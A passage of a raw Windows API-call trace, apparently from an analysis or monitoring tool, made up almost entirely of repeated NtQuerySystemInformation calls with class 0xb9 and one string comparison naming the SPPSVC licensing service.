(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x28, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0208.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0208.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x58, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0208.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x20, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0208.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd448, Length=0x50, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x38, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x28, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x38, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0208.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x38, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd170, Length=0x20, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd170, Length=0x20, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd170, Length=0x20, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x38, ResultLength=0x0) [0208.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x50, ResultLength=0x0) [0208.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x38, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x28, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x28, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x28, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x28, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x28, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x38, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x28, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x28, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x38, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x20, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x20, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x38, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x20, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.789] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d8, Length=0x50, ResultLength=0x0) [0208.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, 